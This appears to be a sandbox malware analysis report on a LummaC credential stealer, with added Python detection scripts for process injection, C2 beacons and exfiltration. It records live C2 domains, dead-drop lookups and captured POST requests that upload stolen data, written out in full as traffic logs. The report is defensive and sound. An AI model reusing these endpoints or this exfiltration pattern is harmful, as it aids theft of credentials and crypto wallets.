
Windows Analysis Report
Loader.exe

Overview

General Information

Sample name: Loader.exe
Analysis ID: 1633709
MD5: 62d09972bfc8e79a68fba0dae33980ca
SHA1: e41b0d005a22daaa9377dc2da9365f4d606eee44
SHA256: ffd1d2d2be886bb1e96fa1fc15b5f24cd66bd50ea15f9b542f63d371f52c839d
Tags: exe, user-TornadoAV_dev

Detection

LummaC Stealer
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Yara detected LummaC Stealer
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to detect virtual machines (SLDT)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • Loader.exe (PID: 7596 cmdline: "C:\Users\user\Desktop\Loader.exe" MD5: 62D09972BFC8E79A68FBA0DAE33980CA)
    • conhost.exe (PID: 7616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Loader.exe (PID: 7788 cmdline: "C:\Users\user\Desktop\Loader.exe" MD5: 62D09972BFC8E79A68FBA0DAE33980CA)
  • cleanup
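The tree above shows Loader.exe (PID 7596) starting a second copy of itself (PID 7788) with the identical command line, and the YARA hits below land in that second process (process index 2, region 0x400000): the launch pattern behind the "Creates a process in suspended mode" and "Injects a PE file into a foreign processes" signatures. The following hunt over process-creation events is an added example, not part of the Joe Sandbox report; the events are constructed from the tree on this page, the parent PID of the first Loader.exe is an assumed placeholder, and the allow list of legitimate self-spawners is an assumption to tune per estate.

```python
"""Flag processes that launch the same binary with the same command line
(the self-spawn that precedes hollowing/injection of the unpacked payload)."""
from dataclasses import dataclass

# Browsers legitimately start copies of themselves; keep them out of the
# result (assumed list, extend as needed).
KNOWN_SELF_SPAWNERS = {"chrome.exe", "msedge.exe", "firefox.exe"}


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the executable
    cmdline: str
    md5: str


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def find_self_spawns(events: list[ProcEvent]) -> list[tuple[ProcEvent, ProcEvent]]:
    """Return (parent, child) pairs where a process launched the same binary
    (same path and same file hash) with the same command line."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for child in events:
        parent = by_pid.get(child.ppid)
        if parent is None:
            continue
        same_binary = (child.image.lower() == parent.image.lower()
                       and child.md5.lower() == parent.md5.lower())
        if not same_binary or basename(child.image) in KNOWN_SELF_SPAWNERS:
            continue
        if child.cmdline.strip() == parent.cmdline.strip():
            hits.append((parent, child))
    return hits


def injection_targets(events: list[ProcEvent]) -> list[int]:
    """PIDs to dump first: the child side of each self-spawn is where the
    unpacked payload ends up (here the report's YARA hits are on process 2)."""
    return [child.pid for _, child in find_self_spawns(events)]


# Constructed from the process tree in the report (PIDs, paths, command lines
# and MD5s as listed there); PPID 4000 for the first Loader.exe is assumed.
EVENTS = [
    ProcEvent(7596, 4000, r"C:\Users\user\Desktop\Loader.exe",
              r'"C:\Users\user\Desktop\Loader.exe"',
              "62D09972BFC8E79A68FBA0DAE33980CA"),
    ProcEvent(7616, 7596, r"C:\Windows\system32\conhost.exe",
              r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1",
              "0D698AF330FD17BEE3BF90011D49251D"),
    ProcEvent(7788, 7596, r"C:\Users\user\Desktop\Loader.exe",
              r'"C:\Users\user\Desktop\Loader.exe"',
              "62D09972BFC8E79A68FBA0DAE33980CA"),
]

if __name__ == "__main__":
    for parent, child in find_self_spawns(EVENTS):
        print(f"self-spawn: {parent.pid} -> {child.pid} {child.image}")
    print("dump first:", injection_targets(EVENTS))
```

The conhost.exe child is ignored because it is a different binary; only the Loader.exe -> Loader.exe pair is returned, which is the process whose memory the YARA rules matched.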
No configs have been found
Source | Rule | Description | Author
00000002.00000002.2665491875.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security
00000002.00000003.1587677507.0000000000D7C000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000002.00000003.1620380906.0000000000D7C000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000002.00000003.1620222186.0000000000D7A000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000000.00000002.1408953091.0000000000D60000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security
(3 further entries not shown)
Source | Rule | Description | Author
2.2.Loader.exe.400000.1.raw.unpack | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security
2.2.Loader.exe.400000.1.unpack | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security
                No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-10T15:29:47.699077+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49704 | 149.154.167.99 | 443 | TCP
2025-03-10T15:29:49.776853+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49705 | 104.21.77.86 | 443 | TCP
2025-03-10T15:29:51.602881+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49706 | 104.21.77.86 | 443 | TCP
2025-03-10T15:29:55.606128+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49707 | 104.21.77.86 | 443 | TCP
2025-03-10T15:29:58.599894+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49708 | 104.21.77.86 | 443 | TCP
2025-03-10T15:30:01.719283+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49711 | 104.21.77.86 | 443 | TCP
2025-03-10T15:30:05.408546+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49713 | 104.21.77.86 | 443 | TCP
2025-03-10T15:30:09.314077+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49715 | 104.21.77.86 | 443 | TCP
2025-03-10T15:30:13.741882+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49718 | 104.21.77.86 | 443 | TCP
2025-03-10T15:30:15.878307+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49719 | 23.197.127.21 | 443 | TCP
2025-03-10T15:30:18.633101+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49720 | 188.114.96.3 | 443 | TCP


                AV Detection

Source: https://fostinjec.today/LksNAz | Avira URL Cloud: Label: malware
Source: https://astralconnec.icu/DPowko58s | Avira URL Cloud: Label: malware
Source: https://astralconnec.icu/DPowko$$ | Avira URL Cloud: Label: malware
Source: https://sterpickced.digital/BA | Avira URL Cloud: Label: malware
Source: https://sterpickced.digital/ | Avira URL Cloud: Label: malware
Source: https://modelshiverd.icu/bJhnsj | Avira URL Cloud: Label: malware
Source: https://astralconnec.icu/X | Avira URL Cloud: Label: malware
Source: https://astralconnec.icu:443/DPowko | Avira URL Cloud: Label: malware
Source: https://catterjur.run/ | Avira URL Cloud: Label: malware
Source: https://astralconnec.icu/Y | Avira URL Cloud: Label: malware
Source: https://astralconnec.icu/DPowko | Avira URL Cloud: Label: malware
Source: https://astralconnec.icu/a | Avira URL Cloud: Label: malware
Source: Loader.exe | Virustotal: Detection: 32%
Source: Loader.exe | ReversingLabs: Detection: 28%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 95.2% probability
Source: 00000000.00000002.1408953091.0000000000D60000.00000004.00000020.00020000.00000000.sdmp | String decryptor: astralconnec.icu/DPowko
Source: 00000000.00000002.1408953091.0000000000D60000.00000004.00000020.00020000.00000000.sdmp | String decryptor: begindecafer.world/QwdZdf
Source: 00000000.00000002.1408953091.0000000000D60000.00000004.00000020.00020000.00000000.sdmp | String decryptor: garagedrootz.top/oPsoJAN
Source: 00000000.00000002.1408953091.0000000000D60000.00000004.00000020.00020000.00000000.sdmp | String decryptor: modelshiverd.icu/bJhnsj
Source: 00000000.00000002.1408953091.0000000000D60000.00000004.00000020.00020000.00000000.sdmp | String decryptor: arisechairedd.shop/JnsHY
Source: 00000000.00000002.1408953091.0000000000D60000.00000004.00000020.00020000.00000000.sdmp | String decryptor: catterjur.run/boSnzhu
Source: 00000000.00000002.1408953091.0000000000D60000.00000004.00000020.00020000.00000000.sdmp | String decryptor: orangemyther.live/IozZ
Source: 00000000.00000002.1408953091.0000000000D60000.00000004.00000020.00020000.00000000.sdmp | String decryptor: fostinjec.today/LksNAz
Source: Loader.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.77.86:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.77.86:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.77.86:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.77.86:443 -> 192.168.2.5:49711 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.77.86:443 -> 192.168.2.5:49713 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.77.86:443 -> 192.168.2.5:49715 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.197.127.21:443 -> 192.168.2.5:49719 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49720 version: TLS 1.2
Source: Loader.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\Loader.exe | Directory queried: number of queries: 1001
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_0009DAAE FindFirstFileExW, 0_2_0009DAAE
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_0009DB5F FindFirstFileExW,FindNextFileW,FindClose,FindClose, 0_2_0009DB5F
Source: global traffic | TCP traffic: 192.168.2.5:49800 -> 162.159.36.2:53
Source: global traffic | HTTP traffic detected: GET /asdawfq HTTP/1.1 | Connection: Keep-Alive | Host: t.me
Source: global traffic | HTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1 | Connection: Keep-Alive | Host: steamcommunity.com
Source: Joe Sandbox View | IP Address: 23.197.127.21
Source: Joe Sandbox View | IP Address: 188.114.96.3
Source: Joe Sandbox View | IP Address: 149.154.167.99
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49705 -> 104.21.77.86:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49704 -> 149.154.167.99:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49708 -> 104.21.77.86:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49711 -> 104.21.77.86:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49707 -> 104.21.77.86:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49713 -> 104.21.77.86:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49715 -> 104.21.77.86:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49718 -> 104.21.77.86:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49706 -> 104.21.77.86:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49719 -> 23.197.127.21:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49720 -> 188.114.96.3:443
Source: global traffic | HTTP traffic detected: POST /DPowko HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 65 | Host: astralconnec.icu
Source: global traffic | HTTP traffic detected: POST /DPowko HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=XGUEFS079avesl74 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 14927 | Host: astralconnec.icu
Source: global traffic | HTTP traffic detected: POST /DPowko HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=xf1a009lpdH | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 15051 | Host: astralconnec.icu
Source: global traffic | HTTP traffic detected: POST /DPowko HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=K72tmOiEcSmUP4cd | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 20565 | Host: astralconnec.icu
Source: global traffic | HTTP traffic detected: POST /DPowko HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=mkPacGgZ2hQ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 2329 | Host: astralconnec.icu
Source: global traffic | HTTP traffic detected: POST /DPowko HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=v1ZLA8TJ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 587743 | Host: astralconnec.icu
Source: global traffic | HTTP traffic detected: POST /aRIsjI HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 103 | Host: areawannte.bet
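Two request shapes in the traffic above are worth turning into detection logic: the bare GETs to t.me and steamcommunity.com that carry no User-Agent at all (the "HTTP GET or POST without a user agent" signature; the sample fetches a channel and a profile page to learn where its C2 lives), and the POSTs to astralconnec.icu and areawannte.bet that claim to be Chrome/119 although the sender is Loader.exe (a 65-byte urlencoded check-in, then multipart/form-data uploads up to 587743 bytes). The classifier below is an added example, not code from the report; the byte thresholds and the allow list of hosts that may receive browser-UA POSTs are assumptions, and the request heads are constructed to mirror the ones listed on this page.

```python
"""Classify HTTP request heads for dead-drop resolver lookups and for
browser-impersonating beacon/exfiltration POSTs."""
from dataclasses import dataclass, field

DEAD_DROP_HOSTS = {"t.me", "steamcommunity.com"}   # public pages used to look up the C2
EXFIL_MIN_BYTES = 1_000            # assumed: form-data uploads above this are bulk exfil
BEACON_MAX_BYTES = 200             # assumed: a tiny urlencoded POST is a check-in
ALLOWED_POST_HOSTS = {"login.live.com", "www.google.com"}   # assumed allow list


@dataclass
class Request:
    method: str
    path: str
    headers: dict = field(default_factory=dict)


def parse_request(raw: str) -> Request:
    """Parse a request head: request line followed by 'Name: value' lines."""
    lines = [ln for ln in raw.strip().splitlines() if ln.strip()]
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for ln in lines[1:]:
        name, _, value = ln.partition(":")
        headers[name.strip().lower()] = value.strip()
    return Request(method.upper(), path, headers)


def classify(req: Request) -> list[str]:
    hits = []
    host = req.headers.get("host", "").lower()
    ua = req.headers.get("user-agent")
    ctype = req.headers.get("content-type", "").lower()
    length = int(req.headers.get("content-length") or 0)
    # 1) No User-Agent on a GET to a public channel/profile page: a browser
    #    always sends one, the stealer's WinHTTP-style fetch does not.
    if req.method == "GET" and host in DEAD_DROP_HOSTS and ua is None:
        hits.append("dead-drop-resolver-lookup")
    # 2) A Chrome User-Agent on a POST to a host no browser in the estate
    #    should be posting forms to.
    if req.method == "POST" and host not in ALLOWED_POST_HOSTS and ua and "Chrome/" in ua:
        if ctype.startswith("multipart/form-data") and length >= EXFIL_MIN_BYTES:
            hits.append("bulk-form-data-upload")
        elif ctype.startswith("application/x-www-form-urlencoded") and length <= BEACON_MAX_BYTES:
            hits.append("small-urlencoded-beacon")
    return hits


def scan(samples: dict[str, str]) -> dict[str, list[str]]:
    return {name: classify(parse_request(raw)) for name, raw in samples.items()}


CHROME_UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
             "(KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36")

# Constructed request heads mirroring the ones in the report (the report runs
# the headers together on one line; here each header has its own line).
SAMPLES = {
    "telegram": "GET /asdawfq HTTP/1.1\nConnection: Keep-Alive\nHost: t.me\n",
    "steam": "GET /profiles/76561199822375128 HTTP/1.1\nConnection: Keep-Alive\nHost: steamcommunity.com\n",
    "beacon": ("POST /DPowko HTTP/1.1\nConnection: Keep-Alive\n"
               "Content-Type: application/x-www-form-urlencoded\n"
               f"User-Agent: {CHROME_UA}\nContent-Length: 65\nHost: astralconnec.icu\n"),
    "upload": ("POST /DPowko HTTP/1.1\nConnection: Keep-Alive\n"
               "Content-Type: multipart/form-data; boundary=v1ZLA8TJ\n"
               f"User-Agent: {CHROME_UA}\nContent-Length: 587743\nHost: astralconnec.icu\n"),
    # Control: the same Steam profile fetched by a real browser carries a UA.
    "browser": f"GET /profiles/76561199822375128 HTTP/1.1\nHost: steamcommunity.com\nUser-Agent: {CHROME_UA}\n",
}

if __name__ == "__main__":
    for name, verdict in scan(SAMPLES).items():
        print(f"{name:9s} {verdict or ['clean']}")
```

The User-Agent check only works when the proxy or EDR can tie the request to the sending image; the report's "Uses a known web browser user agent for HTTP communication" signature is exactly that mismatch (Chrome/119 claimed, Loader.exe sending), so pair this with process attribution rather than relying on the UA string alone.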
Source: unknown | TCP traffic detected without corresponding DNS query: 162.159.36.2 (4 occurrences)
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (13 occurrences)
Source: Loader.exe, 00000002.00000003.2244248121.0000000000E08000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://steamloopback.host https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: global traffic | DNS traffic detected: DNS query: t.me
Source: global traffic | DNS traffic detected: DNS query: astralconnec.icu
Source: global traffic | DNS traffic detected: DNS query: begindecafer.world
Source: global traffic | DNS traffic detected: DNS query: garagedrootz.top
Source: global traffic | DNS traffic detected: DNS query: modelshiverd.icu
Source: global traffic | DNS traffic detected: DNS query: arisechairedd.shop
Source: global traffic | DNS traffic detected: DNS query: catterjur.run
Source: global traffic | DNS traffic detected: DNS query: orangemyther.live
Source: global traffic | DNS traffic detected: DNS query: fostinjec.today
Source: global traffic | DNS traffic detected: DNS query: sterpickced.digital
Source: global traffic | DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic | DNS traffic detected: DNS query: areawannte.bet
Source: global traffic | DNS traffic detected: DNS query: 15.164.165.52.in-addr.arpa
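The report's automated config extractor found nothing ("No configs have been found"), so the eight "String decryptor" hits in the first process are the only embedded C2 inventory on this page; the DNS queries show the sample walked that list at runtime, and the HTTP lines show which host actually answered. Note that sterpickced.digital was resolved and is flagged by Avira above but is absent from the decrypted list, so a list recovered from one memory region is not the complete configuration. The script below is an added example, not part of the Joe Sandbox report: it parses those three kinds of lines in the form they appear on this page (the input is the report's own lines copied in, with the source column dropped) and ranks each C2 by how far the sample got with it.

```python
"""Build a C2 inventory from Joe Sandbox 'String decryptor', 'DNS query' and
'HTTP traffic detected' lines and cross-check decrypted vs. resolved vs. contacted."""
import re
from urllib.parse import urlsplit

DECRYPTOR_RE = re.compile(r"String decryptor:\s*(\S+)")
DNS_RE = re.compile(r"DNS query:\s*(\S+)")
HTTP_RE = re.compile(r"HTTP traffic detected:\s*(GET|POST)\s+(\S+)")
HOST_RE = re.compile(r"Host:\s*([A-Za-z0-9.-]+)")
DEAD_DROP_HOSTS = {"t.me", "steamcommunity.com"}   # the hosts the report's GETs go to


def parse_report(lines):
    """Return (decrypted {host: path}, resolved {host}, contacted {host: {(method, path)}})."""
    decrypted, resolved, contacted = {}, set(), {}
    for line in lines:
        if m := DECRYPTOR_RE.search(line):
            u = urlsplit("https://" + m.group(1))        # decryptor output has no scheme
            decrypted[u.hostname.lower()] = u.path
        elif m := DNS_RE.search(line):
            resolved.add(m.group(1).lower().rstrip("."))
        elif (m := HTTP_RE.search(line)) and (h := HOST_RE.search(line)):
            contacted.setdefault(h.group(1).lower(), set()).add((m.group(1), m.group(2)))
    return decrypted, resolved, contacted


def triage(decrypted, resolved, contacted):
    """Rank each embedded C2 and surface hosts that were resolved or contacted
    but are missing from the decrypted list (e.g. a C2 learned via dead drop)."""
    status = {}
    for host in decrypted:
        if host in contacted:
            status[host] = "live-c2"
        elif host in resolved:
            status[host] = "resolved-only"
        else:
            status[host] = "dormant"
    contacted_unlisted = set(contacted) - set(decrypted) - DEAD_DROP_HOSTS
    resolved_unlisted = {h for h in resolved - set(decrypted) - set(contacted) - DEAD_DROP_HOSTS
                         if not h.endswith(".in-addr.arpa")}   # drop reverse lookups
    return status, contacted_unlisted, resolved_unlisted


def ioc_lines(decrypted, status):
    """One 'host<TAB>path<TAB>status' line per embedded C2, sorted, for a blocklist."""
    return [f"{h}\t{decrypted[h]}\t{status[h]}" for h in sorted(decrypted)]


# Lines copied from the report above (source column dropped).
REPORT_LINES = [
    "String decryptor: astralconnec.icu/DPowko",
    "String decryptor: begindecafer.world/QwdZdf",
    "String decryptor: garagedrootz.top/oPsoJAN",
    "String decryptor: modelshiverd.icu/bJhnsj",
    "String decryptor: arisechairedd.shop/JnsHY",
    "String decryptor: catterjur.run/boSnzhu",
    "String decryptor: orangemyther.live/IozZ",
    "String decryptor: fostinjec.today/LksNAz",
    "HTTP traffic detected: GET /asdawfq HTTP/1.1 Connection: Keep-Alive Host: t.me",
    "HTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1 Connection: Keep-Alive Host: steamcommunity.com",
    "HTTP traffic detected: POST /DPowko HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=v1ZLA8TJ Content-Length: 587743 Host: astralconnec.icu",
    "HTTP traffic detected: POST /aRIsjI HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Content-Length: 103 Host: areawannte.bet",
] + [f"DNS query: {d}" for d in (
    "t.me", "astralconnec.icu", "begindecafer.world", "garagedrootz.top",
    "modelshiverd.icu", "arisechairedd.shop", "catterjur.run", "orangemyther.live",
    "fostinjec.today", "sterpickced.digital", "steamcommunity.com", "areawannte.bet",
    "15.164.165.52.in-addr.arpa")]

if __name__ == "__main__":
    dec, res, con = parse_report(REPORT_LINES)
    status, extra_contacted, extra_resolved = triage(dec, res, con)
    print("\n".join(ioc_lines(dec, status)))
    print("contacted but not in decrypted list:", extra_contacted)
    print("resolved but never contacted or listed:", extra_resolved)
```

On this report the triage yields astralconnec.icu as the live C2, the other seven decrypted hosts as resolved-only, areawannte.bet as a contacted host that is not in the decrypted list, and sterpickced.digital as resolved but never contacted; all of them belong on the blocklist, since the dormant ones are the fallbacks the sample will try when the live one is taken down.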
Source: unknown | HTTP traffic detected: POST /DPowko HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 65 | Host: astralconnec.icu
Source: Loader.exe, 00000002.00000003.2244248121.0000000000E08000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://127.0.0.1:27060
Source: Loader.exe, 00000002.00000003.1549686018.000000000348F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: Loader.exe, 00000002.00000003.1549686018.000000000348F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: Loader.exe, 00000002.00000003.1549686018.000000000348F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: Loader.exe, 00000002.00000003.1549686018.000000000348F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: Loader.exe, 00000002.00000003.1549686018.000000000348F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: Loader.exe, 00000002.00000003.1549686018.000000000348F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: Loader.exe, 00000002.00000003.1549686018.000000000348F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: Loader.exe, 00000002.00000003.1549686018.000000000348F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: Loader.exe, 00000002.00000003.1549686018.000000000348F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: Loader.exe, 00000002.00000003.2244305057.0000000003516000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244248121.0000000000DD9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: Loader.exe, 00000002.00000003.1549686018.000000000348F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.c.lencr.org/0
Source: Loader.exe, 00000002.00000003.1549686018.000000000348F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.i.lencr.org/0
Source: Loader.exe, 00000002.00000003.1488676251.00000000034DE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org?q=
Source: Loader.exe, 00000002.00000003.2244248121.0000000000E08000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.steampowered.com/
